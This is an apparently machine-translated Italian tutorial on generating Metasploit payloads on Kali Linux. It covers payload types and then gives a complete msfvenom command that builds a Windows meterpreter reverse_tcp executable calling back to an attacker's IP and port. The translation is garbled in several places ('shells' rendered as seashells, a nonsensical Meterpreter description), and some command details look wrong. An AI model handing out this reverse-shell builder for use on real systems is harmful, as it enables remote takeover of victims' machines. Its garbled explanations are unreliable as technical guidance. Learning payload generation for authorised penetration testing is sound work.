Come creare carico utile con metasploit

Come creare carico utile con metasploit

Metasploit è una delle piattaforme più utilizzate per condurre test di penetrazione, hacking e persino giochi informali. Dobbiamo comprendere come funzionano i componenti e i payload per usarli in modo efficace. In termini semplicistici, un carico utile è un'azione che deve essere eseguita quando un exploit ha completato la sua esecuzione. Un payload fa parte del codice che lo exploit esegue. Gli exploit vengono utilizzati per ottenere l'accesso a un sistema e i payload svolgono attività specifiche. Metasploit ha molti carichi utili, come gusci inversi, conchiglie, meterpreter e altri. Diversi payload funzioneranno con il maggior numero di exploit; Tuttavia, trovare il payload adeguato che funzionerà con lo exploit richiede alcune indagini. Una volta che hai deciso su un exploit, usa il comando "Visualizza payloads" di Metasploit per ottenere un elenco di payload che funzionerà con esso.

Tipi di payload

In Metasploit, ci sono alcuni diversi tipi di payload. Questi tre tipi di base sono quelli che alla fine finirai usando di più:

Single

I singoli sono estremamente piccoli e destinati ad iniziare una conversazione prima di passare a un'altra fase.

Stager

Il payload utilizza lo stager per stabilire una connessione di rete tra il sistema di destinazione e il processore di carico utile del server Metasploit. Lo stager consente di caricare e inserire un payload più grande e complicato definito lo stadio usando un carico utile più piccolo.

Meterpreter

MeterPreter è diventato un payload di attacco Metasploit che dà un fattore intruso che influisce su come sfogliare ed eseguire il codice sulla macchina target. MeterPreter è un'applicazione solo per la memoria che non scrive al disco. MeterPreter ha cercato di iniettarsi sul processo attaccato, da dove può passare ad altri processi operativi; Pertanto, non vengono generati nuovi processi. MeterPreter è stato creato per evitare gli svantaggi dell'uso di payload specializzati consentendo al contempo la scrittura di comandi e assicurando una comunicazione crittografata. Il rovescio della medaglia dell'impiego di payload specifici è che gli allarmi possono essere sollevati se un processo più recente inizia in tutto il sistema di destinazione.

Creazione del payload con Metasploit in Kali Linux

Per creare carico utile con Metasploit in Kali Linux, seguire tutti i passaggi descritti di seguito:

Passaggio 1: accedere a msfconsole

msfconsole è l'unico mezzo per accedere alla maggior parte della funzionalità di Metasploit. MsfConsole offre alla piattaforma un'interfaccia basata sulla console. MSFConsole è stata l'interfaccia MSF con le migliori caratteristiche ed è la più stabile. La capacità di readline completa, le tabbl e il completamento del comando sono tutti forniti da msfconsole. I comandi esterni possono essere eseguiti dalla msfconsole. Utilizzare il seguente comando indicato per accedere a msfconsole su Kali Linux.

$ msfconsole

Passaggio 2: accedere a msfvenom

Il payload che effettuiamo utilizzando MSFvenom sarà un payload TCP inverso. Questo payload crea un eseguibile che, quando avviato, stabilisce una connessione tra il computer dell'utente e il nostro gestore Metasploit, permettendoci di condurre una sessione di meter. Utilizzare il seguente comando indicato per accedere a MSFvenom su Kali Linux.

$ msfvenom -p

Passaggio 3: creazione del payload

Utilizzare il seguente comando indicato per creare un carico utile in Metasploit su Kali Linux.

$ msfvenom -p windows/meterpreter/reverse_tcp lhost = 192.168.43.28 lport = 6001 -f exe -o payload.exe


È possibile utilizzare l'opzione -P per indicare quale carico utile si desidera utilizzare. Lhost sembra essere l'indirizzo IP dell'attaccante a cui si desidera che il carico utile. Lport è proprio come sopra; Questa è la porta a cui si collegherà il payload e deve essere configurato nel gestore. -F istruisce msfvenom come generare il payload; In questo caso, stiamo andando per un programma eseguibile o exe. Il payload creato dall'esecuzione del comando sopra è 73802 byte, come mostrato dall'immagine sopra attaccata.

Per verificare dove è stato creato, navigeremo verso la directory della casa. Dallo screenshot di seguito, puoi verificare quel carico utile.Exe è stato creato con successo.

Puoi controllare le sue proprietà facendo doppio clic su di esso. La dimensione del payload creato è la stessa che è stata mostrata sullo schermo del terminale.

Conclusione

Questo articolo ha fornito una breve introduzione relativa ai payload e ai loro tipi. Abbiamo seguito le istruzioni passo-passo per creare carichi utili in Metasploit nel sistema operativo Kali Linux.